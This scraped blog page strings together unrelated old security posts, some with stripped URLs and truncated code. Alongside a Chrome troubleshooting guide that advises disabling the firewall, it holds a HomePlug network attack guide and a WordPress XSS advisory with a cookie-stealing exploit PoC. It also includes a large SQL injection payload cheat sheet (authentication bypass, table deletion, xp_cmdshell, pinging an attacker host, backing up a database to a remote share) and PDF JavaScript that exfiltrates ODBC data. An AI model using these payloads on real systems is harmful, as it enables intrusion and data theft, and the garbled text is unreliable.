Category: MD Hacks


Google Chrome is not connecting to the Internet (Fixed)

Looking for the ways to fix the error on Google Chrome “Unable to connect to the internet”? Here you will find some handy ways to work around this issue in no time. There may be different reasons for this problem. The problem is interrelated to DNS PROBE FINISHED NO INTERNET error that also occurs in Google chrome, these fixes will work for both error equivalently. I am going to share my personal experience with you. So, let’s start discussing all methods one followed by the other.

Google Chrome is not connecting to the Internet

Method # 1: Reboot the System

You should restart the system to try browsing in Chrome once more. When the computer restarts, just open Google Chrome and type your desired website to check whether it shows “” error or it is resolved.

Method # 2: Re-install the Browser

If the browser is still not responding, you should uninstall and re-install the browser to give it another try. For this, do the following steps.

  • You should go to the “Control Panel.”
  • In “Programs” category, you should select the option “Uninstall a program.”
  • Here, you will find a list of the programs installed on your system. You need to click “Google Chrome” and select “Uninstall” from above. It will uninstall this browser. Later, you can re-install it.

Method # 3: Disable the Firewall

If you are using an antivirus program, that may be blocking the way of Google Chrome for browsing. So, you need to disable its Firewall and try to browse your desired sites.

Method # 4: Clear the Cache

You should clear the cache from Google Chrome to remove this error. Use the following instructions to perform this action.

Go to the address bar and type “://net-internals/#dns” and press “Enter” key.

Method # 5: Use Command Prompt

You should be a bit technical this time if none of the above-discussed methods works well. Open Command Prompt with admin rights.

  • Go to the “Start” and type in the Search bar “Command Prompt”. As soon it appears in the search results, you should right-click on the Command Prompt and select “Run as Administrator.”
  • Now the Command Prompt window appears before you. Start typing the following commands one by one and every time press “Enter” to move below.

“ipconfig /release”

“ipconfig /all”

“ipconfig /flushdns”

“ipconfig /renew”

  • Now you need to type here two other commands given below.

“netsh in tip set dns”

“netsh winsock reset”

Method # 6: Change DNS Address

You should replace the DNS Address so that your browser may not show the “DNS_PROBE_FINISHED_NO_INTERNET” error again. You can follow the steps below that would fix this issue for sure.

  • Just go to the bottom right corner where you find the Network icon. You need to right-click on it to view its options.
  • Now select “Open Network and Sharing Center” to move ahead.
  • In the left pane, you will see “Change Adapter Settings” option. Just click this option to view its content.
  • When you right-click the active network connection, there you will find “Properties” at the bottom. Select this option.
  • In the Properties, “Networking” tab, you need to select “Internet Protocol Version 4 (TCP/IPv4)” and click “Properties.”
  • Click the radio button “Use the following DNS server addresses” and provide “” in the Preferred DNS Server box and “” in the Alternate DNS Server box.

Hacking HomePlug Networks

I don’t know whether HomePlug networks are growing in use or not, but the following statements caught my attention:

“Officials at Intellon, the chip maker that developed the HomePlug spec, say that hacking into a HomePlug network would require cracking the government’s DES encryption standard.” – link

My favourite:

“HomePlug specification products also protect data by utilizing powerful DES encryption, which makes hacking into a HomePlug network virtually impossible.” – link

If you are not sure what a HomePlug network is then maybe the following diagram will help:

As you can see above, HomePlug’s in many cases can replace a Wireless infrastructure or work along side it (i.e. your house or office has thick walls weakening the signal). You simply plug it into your wall socket and attach a network lead to it.


Now I didn’t really spend ages on coming up with advanced hacking techniques for these things. It would be overkill me thinks. These devices are insecure in their default state. They are also insecure in their “secured” state.

So lets put our attack together:
1. HomePlug Detection & Enumeration
2. Exploitation in its default state
3. Exploitation in its “secured” state
4. Hacker Countermeasures

1. HomePlug Enumeration

You need a compatible HomePlug to start. A single plug can cost between £20 – £30. Ensure that the plug is HomePlug v1.0 certified or you will most likely fail in your endeavor.

You will then require a target, testing your own network is easy enough, attackers will most likely test your network from an outside wall socket.

Install the software that comes with the plug – this software was exactly same with both my HomePlug makes (other then a few logo changes). Plug your HomePlug into the wall socket of the network you what to connect to. Load up the software and simply click “Scan Powerlines Network”. You could also just load a sniffer and check if your rogue plug has already joined the network.

2. Exploitation in its default state

I couldn’t find the v1.0 specification rfc, but it was trivial to work out that all these devices use a default network key of “HomePlug” to start with. Obviously this was done to allow for plug and play. Load up your sniffer and monitor network traffic. If the default key is used you should see NetBIOS broadcasts etc. Job done.

3. Exploitation in its “secured” state

56-bit DES encryption may have been considered cryptographically strong in the stone ages but not today.

Even though 56-Bit DES encryption (2^56 possible keys) is breakable, it may take a fair chunk of time to crack – although Rainbowtables has made this alot easier. Personally, I would try some weak passwords to begin with.

4. Hacker Countermeasures

Do the obvious. Use a very strong key to secure your HomePlug’s. Ensure thats your network devices are firewalled. Hopefully the newer versions will provide stronger encryption options.

Input Validation Cheat Sheet

Related articles: SQL Injection Cheat Sheet

We sometimes carelessly throw characters up and about in an attempt to find a gem. This paper covers miscellaneous injection characters and their meanings when applied to web application testing.

Character(s) Details
NULL or null Often produces interesting error messages as the web application is expecting a value. It can also help us determine if the backend is a PL/SQL gateway.
{‘ , ” , ; , <!} Breaks an SQL string or query; used for SQL, XPath and XML Injection tests.
{– , = , + , “} These characters are used to craft SQL Injection queries.
{‘ , &, ! , ¦ , < , >} Used to find command execution vulnerabilities.
“><script>alert(1)</script> Used for basic Cross-Site Scripting Checks.
{%0d , %0a} Carriage Return Line Feed (new line); all round bad.
{%7f , %ff} byte-length overflows; maximum 7- and 8-bit values.
{-1, other} Integer and underflow vulnerabilities.
Ax1024+ Overflow vulnerabilities.
{%n , %x , %s} Testing for format string vulnerabilities.
../ Directory Traversal Vulnerabilities.
{% , _, *} Wildcard characters can sometimes present DoS issues or information disclosure.

These characters can be represented in many different ways (i.e. Unicode). It is important to understand this when restricting input to these character sets.



WordPress Persistent XSS

Vulnerability Title: WordPress Persistent XSS
Author: David Kierznowski
Software Vendor: WordPress Persistent XSS
Versions affected: Confirmed in v2.0.5 (latest)

WordPress is a popular open source blogging software.
A persistent XSS vulnerability has been found in WordPress (to be honest I have found a few problems and hope to publish these soon). This issue affects the latest version v2.0.5.

When editing files a shortcut is created titled ‘recently accessed files’. The anchor tag text is correctly escaped with wp_specialchars(); however, the link title is not sanitised. Instead, it is passed to get_file_description($file). The only restriction or limitation here is that our text is passed through basename. This means standard script tags will fail when ending with ‘/’. We can get around this by using “open” IMG tags; this works under FF and IE.

Vulnerable code:

[line 22]$recents = get_option('recently_edited');
[line 72]update_recently_edited($file);
[Line 116]:foreach ($recents as $recent) :
        echo "<li><a href='templates.php?file="
          . wp_specialchars($recent, true) . "'>"
          . get_file_description(basename($recent))
          . "</a></li>";

Vulnerable function:

function get_file_description($file) {
        global $wp_file_descriptions;

        if (isset ($wp_file_descriptions[basename($file)])) {
                return $wp_file_descriptions[basename($file)];
        elseif (file_exists(ABSPATH.$file)) {
                $template_data = implode('', file(ABSPATH.$file));
                if (preg_match("|Template Name:(.*)|i",
                   $template_data, $name))
                        return $name[1];
        return basename($file);

Proof of concept:


Temp Fix:
Comment out the following line in wp-admin/templates.php
[Line 72] update_recently_edited($file);

WordPress was contacted: 26/12/06 22:04 BST
Reply received: 27/12/06 06:11 BST
WordPress has fixed this for v2.0.6 and a patch has been released
for v2.0.5, see

RSS Injection in Sage part 2

2 months ago, both pdp any myself released a vulnerability “Cross Context Scripting in Sage”. This issue was resolved in Sage release 1.3.7 (see: I found a new vulnerability which affects the latest version, Sage 1.3.8. In addition to the XSS vulnerability, it should be noted (as in the previous vulnerability) that this issue occurs within the Local Browser Context.


A number of popular online RSS readers allow images to be embedded within Feeds. It has been known for some time now, that the amount of people subscribed to your feed can be determined by using the image src functionality. This is interesting from an anonymity point of view. I was curious to know just how well these applications would prevent and/or restrict the “img onload” features.

Ironically, Sage seems to handle this quite well. It removes any “onload” attribute within an IMG element. Sage also completely removes offending JavaScript code. However, it fails to remove the script tags when inserted within the IMG element. In addition to this, it will actually end the IMG element for us. For example:

<img src=”” <script>alert(’blah’);</script> ></img>
<img src=”” > <script>alert(’blah’);</script> </img>
Notice the trailing > is removed and added before our JavaScript code.
This feed will open “/etc/passwd” for Linux users and “…./etc/hosts” for MS Windows users. Please note I have not tested the Windows feed.

WordPress template.php Exploit

Its been a few days since the release of:

Other references:

Time to release a proof of concept exploit for this. I am sure the crackers will already be exploiting this in the wild.

If you remember from my original advisory, our attack was limited due to our attack being passed through PHP’s basename function. To get around this we borrow the characters from document.location. I wanted an exploit that was simple and compact.

I created two HTML files to aid in my research, Injection.html and Recover.html.

First: Inject.html

This is our actual exploit (we use a nested IMG exploit):

        img src='https://wordpress-site/wp/wp-admin/templates.php?file=<
        img src=%27%27 onerror="javascript:
        var s=(document.location.toString().charAt(6));
        var url=(;

Second: Recover.php

If we mess up we may create an annoying, persistent redirect that prevents us access to the templates.php file. So this next HTML file simply resets our templates.php file using the same injection point.

<img src="https://wordpress-site/wp/wp-admin/templates.php?file=a">
<img src="https://wordpress-site/wp/wp-admin/templates.php?file=b">
<img src="https://wordpress-site/wp/wp-admin/templates.php?file=c">
<img src="https://wordpress-site/wp/wp-admin/templates.php?file=d">
<img src="https://wordpress-site/wp/wp-admin/templates.php?file=e">
<img src="https://wordpress-site/wp/wp-admin/templates.php?file=f">

Job done; all that is required is for an attacker to setup a file on a remote server to capture the cookies.


I hope this article “strongly” encourages WordPress users to apply the latest patch ASAP! Another attack vector I was thinking of was injecting PHP code straight into the WordPress Installation. I can see really bad worm potential with this vulnerability. I stress again, apply the patch.

CSRF with MS Word

Update: 15/2:
CSRF in MS Word part II
Update 28/11:

It is interesting to note that MS Word 2003 will actually warn the user. Obviously, someone at Microsoft saw the potential for badness here. Good stuff by

Microsoft Word has been plagued with vulnerabilities in the past. Therefore, mail servers often restrict email with the .doc extension. However, with applications like Microsoft SharePoint which allows sharing of content between users, the door is opened just slightly to allow for deviance. This article demonstrates using Microsoft Word in Cross Site Request Forgery (CSRF) Attacks.

Our attack vector is found in exploiting MSWord’s frame capabilities: By creating malicious frames in a document and pointing them to a malicious URL, we can exploit multiple, persistent CSRF vulnerabilities (and possibly the browser). The cool part? This all happens transparently with no warnings to the user. Also, this IMG tag can be hidden within a document which means that our malicious code is executed everytime the document is opened. Furthermore, an attacker can use either 302 redirects or modify the infected HTML file to alter his/her targets array. This means our payload can be updated from the attackers end.

This is how we do it:

1. Create new document
2. Goto Insert > Format > Frames >
3. Right Click on the frame > Frame Properties >
4. Set hyperlink to our exploit page which contains malicious IMG tags.

An example target HTML file can be seen below:

<img src="http://non-existent/login.php?changepass=123&verify=123" alt=""  />

Obviously curious about how MS Word communicates, I sniffed the connection:

GET /login.php?changepass=123&verify=123 HTTP/1.1
Accept: */*
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
Host: non-existent
Connection: Keep-Alive
Cookie: blah

As we can see, it is using Internet Explorer to fetch these pages. With some creativity other exploitation techniques may be possible (i.e. ActiveX exploitation). However, attacks are limited due to scripting being disabled by default. Thus we see that MS Word can be used to launch multiple, persistent (well almost) CSRF attacks.

SQL Injection Cheat Sheet

For More Posts Visit:


Date Change
09/07/07 DB2 Database SQL Injection Cheatsheet(Author:
09/07/07 Ingres Database SQL Injection Cheatsheet (Author:
13/03/07 Bypass SQL Injection Filters
03/01/06 Added some more blind SQL injection tests for MySQL (Author: jungsonn)
21/12/06 Added Concat tests for blind SQL Injection tests.
06/Nov/06 Added PostgreSQL payloads
06/Nov/06 Added Data to Oracle
06/Nov/06 Added Sybase section
Oct/06 Wrote initial paper.


This paper was primarily written to aid penetration testers. I hope you find it useful. Please email me additional payloads as you find them.

» Generic – Bypass Authentication

The following payloads are generally applied to login forms with a username and password. Correctly performing these attacks will allow you to authenticate to the web application (unless otherwise stated).

Payload Description (if any)
realusername’ OR 1=1– Authenticate as a real user without requiring a password.
‘OR ” = ‘ Allows authentication without a valid username.
admin’– Authenticate as user admin without a password.
‘ union select 1, ‘user’, ‘pass’ 1– Requires knowledge of column names.
‘; drop table users– DANGEROUS! this will delete the user database if the table name is ‘users’.

» Microsoft SQL

Payload Description (if any)
‘admin –sp_password sp_traceXXX audit evasion. The sp_password prevents storing clear text passwords in the log files. Appending this after your comments (–) can prevent SQL Injection queries being logged.
select @@version View database version.
select @@servername Misc. information disclosure
select @@microsoftversion Misc. information disclosure
select * from master..sysservers Misc. information disclosure
select * from sysusers View database usernames and passwords.
exec master..xp_cmdshell ‘ipconfig+/all’ Misc. command execution with cp_cmdshell.
exec master..xp_cmdshell ‘net+view’ Misc. command execution with cp_cmdshell.
exec master..xp_cmdshell ‘net+users’ Misc. command execution with cp_cmdshell.
exec master..xp_cmdshell ‘ping+system-controlled-by-attacker’ Misc. command execution with cp_cmdshell – this is useful for blind SQL Injection tests (where no results are displayed).
BACKUP database master to disks=’\\{IP}\{sharename}\backupdb.dat’ Backup entire database to a file. This attack can be used to steal a database.
create table myfile (line varchar(8000))” bulk insert foo from ‘c:\inetpub\wwwroot\auth.asp’” select * from myfile”– Reading files on the filesystem.
xp_servicecontrol (START or STOP) <service> Start and stop Windows Services.
str1 + str2 OR n+n Concat strings for blind SQL Injection tests.

» Sybase

Payload Description (if any)
select @@version”– View database version.
select name from master..syslogins”– Misc. information disclosure
select name from master..sysdatabases”– Misc. information disclosure
convert(integer,(select+min(name)+from+syslogins+where+name>’))– Integer conversion “error” trick.
convert(integer,(select+min(name)+from+syslogins+where+name>’sybase’))– An error will occur presenting the first value of the rowset (lets say its sybase). We then continue as before by placing the value into our query. An error will then present the next value in the rowset. We continue as before.
xp_cmdshell ‘ipconfig+/all’ Misc. command execution with cp_cmdshell.
xp_cmdshell ‘net+view’ Misc. command execution with cp_cmdshell.
xp_cmdshell ‘net+users’ Misc. command execution with cp_cmdshell.
xp_cmdshell ‘ping+system-controlled-by-attacker’ Misc. command execution with cp_cmdshell – this is useful for blind SQL Injection tests (where no results are displayed).
waitfor delay ‘0:0:5’ Misc. command execution with cp_cmdshell – this is useful for blind SQL Injection tests (where no results are displayed).
create proxy_table myfile external file at “c:\temp\file_to_read.txt” select * from myfile” Reading files on the filesystem.
create table myfile (record varchar(2000)) external file at “c:\temp\myfile.exe” insert into myfile values(0xAND_YOUR_BINARY_DATA)” Write file to filesystem.
str1 + str2 or n+n Concat strings for blind SQL Injection tests.


Payload Description (if any)
select @@version; View database version.
select host,user,db from mysql.db; Misc. information disclosure
select host,user,password from mysql.user; View MySQL usernames and passwords.
create table myfile (input TEXT); load data infile ‘/etc/passwd’ into table myfile; OR load data infile ‘/home/{user}/.rhosts’ into table myfile; select * from myfile; Reading files on the filesystem.
select host,user,password from user into outfile ‘/tmp/passwd’; Write files on the filesystem. This attack is limited by the fact that you can only write to either “/tmp” or “/var/tmp”.
select CONCAT(”a”,”b”); Concat strings for blind SQL Injection tests.
BENCHMARK(1000000000,MD5(’gainingtime’)) Cause delay for blind SQL Injection tests.
BENCHMARK(1000000000,MD5(CHAR(116))) Cause delay for blind SQL Injection tests. Same as before, but this can be used if quotes are filtered.
IF EXISTS (SELECT * FROM users WHERE username = ‘root’) BENCHMARK(1000000000,MD5(’gainingtime’)) Check if username exists, if yes there will be an delay.
IF EXISTS (SELECT * FROM users WHERE username = ‘root’) WAITFOR DELAY ‘0:0:3′ Check if username exists, if yes there will be an delay for 3 seconds.

» Oracle

Robert Hurlbut has put together an awesome document on Oracle SQL Injection. He seems to have far more experience in this area then I, so i will merely present a link to his blog entry on this topic (

Payload Description (if any)
str1 || str2 OR CONCAT (str1, str2) Concat strings for blind SQL Injection tests.

» PostgreSQL

Payload Description (if any)
select version(); View database version.
select current_database(); Misc. information disclosure
select current_user; Misc. information disclosure
select session_user; Misc. information disclosure
select current_setting(’log_connections’); Misc. information disclosure
select current_setting(’log_statement’); Misc. information disclosure
select current_setting(’port’); Misc. information disclosure
select current_setting(’password_encryption’); Misc. information disclosure
select current_setting(’krb_server_keyfile’); Misc. information disclosure
select current_setting(’virtual_host’); Misc. information disclosure
select current_setting(’port’); Misc. information disclosure
select current_setting(’config_file’); Misc. information disclosure
select current_setting(’hba_file’); Misc. information disclosure
select current_setting(’data_directory’); Misc. information disclosure
select * from pg_shadow; View database usernames and passwords.
select * from pg_group; View database usernames and passwords.
create table myfile (input TEXT); copy myfile from ‘/etc/passwd’; select * from myfile; Read files on the filesystem.
copy myfile to ‘/tmp/test’; Write files to filesystem.
str1 || str2 Concat strings for blind SQL Injection tests.

» DB2

Payload Description (if any)
Comments select blah from foo; — comment like this
 Batching Queries Allowed? ???
 Database Version select versionnumber, version_timestamp from sysibm.sysversions;
 Current Database User select user from sysibm.sysdummy1;
select session_user from sysibm.sysdummy1;
 System User for Current Connection select system_user from sysibm.sysdummy1;
 Current Database select current server from sysibm.sysdummy1;
 Limiting Rows Returned SELECT foo FROM bar fetch first 1 rows only;
Returning N Rows starting at Offset M select name from (SELECT name FROM sysibm.systables order by
name fetch first N+M-1 rows only) sq order by name desc fetch first N rows only;
 List Tables select name from sysibm.systables;
 List Columns select name, tbname, coltype from sysibm.syscolumns;
 List Databse Users and Passwords Database authorities (like roles, I think) can be listed like this:
select grantee from syscat.dbauth;
 FROM clause mandated in SELECTs? Yes, use sysibm.sysdummy1:
select 123 from sysibm.sysdummy1;
 UNION supported Yes
select 123 from sysibm.sysdummy1 union select 234 from sysibm.sysdummy1;
 Enumerate Tables Privs select * from syscat.tabauth;
 Enumerate Current Privs select * from syscat.dbauth where grantee = current user;
select * from syscat.tabauth where grantee = current user;
 Length of a string select name, tbname, coltype from sysibm.syscolumns; — returns 3
 Bitwise AND This page seems to indicate that DB2 has no support for bitwise operators!
 Substring SELECT SUBSTR(’abc’,2,1) FROM sysibm.sysdummy1;  — returns b
 ASCII value of a character select ascii(’A’) from sysibm.sysdummy1; — returns 65
Character from ASCII value select chr(65) from sysibm.sysdummy1; — returns ‘A’
 Roles and passwords N/A (I think DB2 uses OS-level user accounts for authentication.)
List Database Procedures  ???
Create Users + Granting Privs  ???
 Time Delays  ???
 Execute OS Commands  ???
 Write to File System  ???
 Concatenation SELECT ‘a’ concat ‘b’ concat ‘c’ FROM sysibm.sysdummy1; — returns ‘abc’
select ‘a’ || ‘b’ from sysibm.sysdummy1; — returns ‘ab’
 Casting SELECT cast(’123′ as integer) FROM sysibm.sysdummy1;
SELECT cast(1 as char) FROM sysibm.sysdummy1;
List schemas SELECT schemaname FROM syscat.schemata;

» Ingres

Payload Description (if any)
Comments Normal “–” and C-style /**/ comments are allowed:
select 123; — sdfjsdlkfj
select 123; /* sdfsdf */
 Batching Queries Allowed? Not via DBI in PERL.  Subsequent statements seem to get ignored:
select blah from table where foo = 1; select … doesn’t matter this is ignored.
 Database Version select dbmsinfo(’_version’);
 Current Database User select dbmsinfo(’session_user’);
 System User for Current Connection select dbmsinfo(’system_user’);
 Current Database select dbmsinfo(’database’);
 Limiting Rows Returned select top 10 blah from table;
select first 10 blah form table;
 Returning N Rows starting at Offset M Astoundingly, this doesn’t seem to be possible!
 List Tables select table_name, table_owner from iitables;
select relid, relowner, relloc from iirelation;
select relid, relowner, relloc from iirelation where relowner != ‘$ingres’;
 List Columns select column_name, column_datatype, table_name, table_owner from iicolumns;
 List Databse Users and Passwords First connect to iidbdb, then:
select name, password from iiuser;
 FROM clause mandated in SELECTs? No.  You don’t need to select form “dual” or anything.  The following is legal:
select 1;
 UNION supported Yes.  Nothing tricky here.  The following is legal:
select 1 union select 2;
 Enumerate Tables Privs select table_name, permit_user, permit_type from iiaccess;
 Enumerate Current Privs select dbmsinfo(’db_admin’);
select dbmsinfo(’create_table’);
select dbmsinfo(’create_procedure’);
select dbmsinfo(’security_priv’);
select dbmsinfo(’select_syscat’);
select dbmsinfo(’db_privileges’);
select dbmsinfo(’current_priv_mask’);
 Length of a string select length(’abc’); — returns 3
 Bitwise AND The function “bit_and” exists, but seems hard to use.  Here’s an
example of ANDing 3 and 5 together.  The result is a “byte” type
with value \001:select substr(bit_and(cast(3 as byte), cast(5 as byte)),1,1);
 Substring select substr(’abc’, 2, 1); — returns ‘b’
 ASCII value of a character  ???
(The “ascii” function exists, but doesn’t seem to do what I’d expect.)
 Roles and passwords First you need to connect to iidbdb, then:
select roleid, rolepass from iirole;
List Database Procedures First you need to connect to iidbdb, then:
select dbp_name,  dbp_owner from iiprocedure;
Create Users + Granting Privs First you need to connect to iidbdb, then:
create user pm with password = ‘password’;
grant all on current installation to pm;
 Time Delays ???
 Execute OS Commands ???
 Write to File System ???
 Concatenation  select ‘abc’ || ‘def’;
 Casting  select cast(123 as varchar);
select cast(’123′ as integer);

» Bypass SQL Injection Filters

Payload Description (if any)
select password from tablename where username = concat(char(39),char(97),char(100),char(109),char(105),char(110),char( 39)) into outfile concat(char(39),char(97),char(100),char(109),char(105),char(110),char( 39)) Writing info into files without single quotes (example). You must specify a new file (it may not exist) and give the correct pathname.
select * from login where user = char(39,97,39) Using char() to bypass restrictions.

References and Credits:

Related articles:

External links:

Backdooring PDF Files

First Seen at


Recently, there has been alot of hype involving backdooring various web technologies. pdp (arcitect) has done alot of work centered around this area.

I saw Jeremiah Grossman mention PDF’s being “BAD”, however, I was unable to easily locate any practical reasons as to why. I decided to investigate this a little further.

At first glance PDF documents seem obviously vulnerable. This is due to the fact that it supports JavaScript. However, there are quite a few twists and turns. It is by no means as straight forward as this.

Adobe supports its own JavaScript object model. For example, “alert(’xss’)” must be called from the app object, so this becomes “app.alert(’xss’)”. This means JavaScript attacks are limited to the functionality supported within Adobe. Secondly, Adobe Reader and Adobe Professional (the two apps I focus on in this article) are very different with regards to which JavaScript objects are allowed.

This article will give two practical examples of how Adobe Professional and Adobe Reader can be backdoored. There are 7 or more points where an attacker can launch malicious code. Both of the attacks discussed below are attached to the “Page Open” event.

The trigger can be accessed via “Page Properties | Actions tab”.

The first attack is simple and affects both Adobe Reader and Adobe Professional. It involves adding a malicious link into the PDF document. Once the document is opened, the user’s browser is automatically launched and the link is accessed. At this point it is obvious that any malicious code be launched. It is interesting to note that both Adobe 6 & 7 did not warn me before launching these URLs.

The second attack involves utilising Adobe’s ADBC (Adobe Database Connectivity) and Web Services support. The following proof of concept code accesses the Windows ODBC, enumerates available databases and then sends this information to “localhost” via the web service.

var cURL = "http://localhost/";
var cTestString = "";

var databaseList = ADBC.getDataSourceList();

var DB = "";
  if (databaseList != null) {
    for (var i=0; i<databaseList.length ; i++)

 cTestString = DB;

 var response = SOAP.request( {
   cURL: cURL,
   oRequest: {
     "http://myxmlns/:echoString": {
      inputString: cTestString
 cAction: "http://additional-opt/"

var result = response["http://no-need/:echoStringResponse"]["return"];
On the server side we get this:
$ ./nc.exe -l -p 80 -v
listening on [any] 80 ...
connect to [] from localhost [] 1924
Accept: */*
Content-Type: text/xml; charset=UTF-8
SOAPAction: "http://additional-opt/"
Content-Length: 578
User-Agent: Mozilla/3.0 (compatible; Acrobat SOAP 7.0)
Host: localhost
Connection: Keep-Alive
Cache-Control: no-cache

<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENC="" xm
lns:SOAP-ENV="" xmlns:xsd="http://www.w" xmlns:xsi=""><SOA
P-ENV:Body><ns0:echoString SOAP-ENV:encodingStyle="
ap/encoding/" xmlns:ns0="http://myxmlns/"><inputString xsi:type="xsd:string">MS
Access 97 DatabaseFoxPro FilesText FilesMS Access DatabaseExcel FilesdBASE Files

I am sure with a bit more creativity even simpler and/or more advanced attacks could be put together. Adobe Acrabat supports, “HTML forms”, “File system access” and the list goes on.
One of the other interesting finds was the fact that you can backdoor all Adobe Acrabat files by loading a backdoored JavaScript file into your %ADOBE-VERSION-DIR%\Acrobat\Javascripts directory.

Proof of concept for example 1 can be found here.

Proof of concept for example 2 can be found here.

Powered by WordPress & Theme by Anders Norén